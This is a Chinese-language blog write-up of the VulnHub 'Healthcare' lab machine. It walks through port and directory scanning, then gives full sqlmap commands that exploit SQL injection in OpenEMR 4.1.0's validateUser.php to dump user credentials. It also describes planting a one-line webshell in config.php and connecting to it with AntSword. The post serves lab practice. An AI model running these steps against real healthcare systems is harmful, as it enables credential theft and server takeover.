Healthcare渗透思路:

提示:这个只是个人的一个思路,结果不一定正确,大佬勿喷

目录

        靶机下载:

        一、信息收集

        二、拿取shell

        总结


靶机下载:

https://download.vulnhub.com/healthcare/Healthcare.ova


一、信息收集

我们先用nmap看看主机的信息:

靶机IP为192.168.153.134

Kali的IP为:183.168.153.128

7ce3879a2e8e481e898c3e8d2c352281.png

我们看看他开了那些端口:

404860fae35d4db380c49a31566c123d.png

我们访问一下他的80端口

ddfd9542dbd04c06a7a03cbe2bf48a5d.png

我们用gobuster或者dirb来扫描他的子目录,能发现一个登录界面:

24883f8bb9f5435ab9224dd016501570.png

我们先试试最简单和常用的一些密码进行登录,(admin,admin),(admin,password)

(admin,admin123)等等类似于这样的账号密码进行登录试试。发现不行

我们用burp抓包看看:

d5f3cdce7c784597bd134bdd75e16505.png

 

我在看网站的左上角,是OpenEMR v4.1.0 我们在网上找了一下对应的漏洞,发现他这个页面存在SQL注入漏洞,我们用sqlmap扫一下看看他的数据库

 

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 --current-db

a152c81f42434a9ea5467122f91acdb5.png

我们发现现在用的是openemr这个数据库,我们爆破一下他的表

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 -D “openemr” --tables

8ae603c9d523444f9516e574d8ff79e0.png

在下面我们发现了user表,爆破他的字段,看看有什么内容:

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 -D “openemr” -T “user” --columns

381aa5fe1c2b45ccb737103083b2733a.png

发现有username和password两个字段,我们看看这两个字段中的内容:

sqlmap -u "http://192.168.153.134//openemr/interface/login/validateUser.php?u=admin" --batch --smart --level=5 -D "openemr" -T "users" -C "username,password" –dump

2097e568bb02457694288e3c6aa7aefd.png

由此我们可以发现admin的账号和密码:

我们试着在刚刚那个登录界面登录一下看看:

登录成功:

二、拿取shell

我们在这个地方找找看看有没有什么地方可以让我们上传一些东西:

发现:在Administration中的file文件里面,有一个config.php文件,我们可以把他的内容修改为一句话木马

9cfdb3acfd2a46618f2dffd70bda4626.png

然后我们再用蚁剑连接他:

打开蚁剑,然后添加

c7fff5a571ce4ca8aad66e3fc4bb3c91.png

保存完后就可以链接了。


总结

这个靶机我没有找到类似于flag这样的字样,不知道有没有,这个只是个人的一个思路,不一定是正确的。最后谢谢观看

 

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值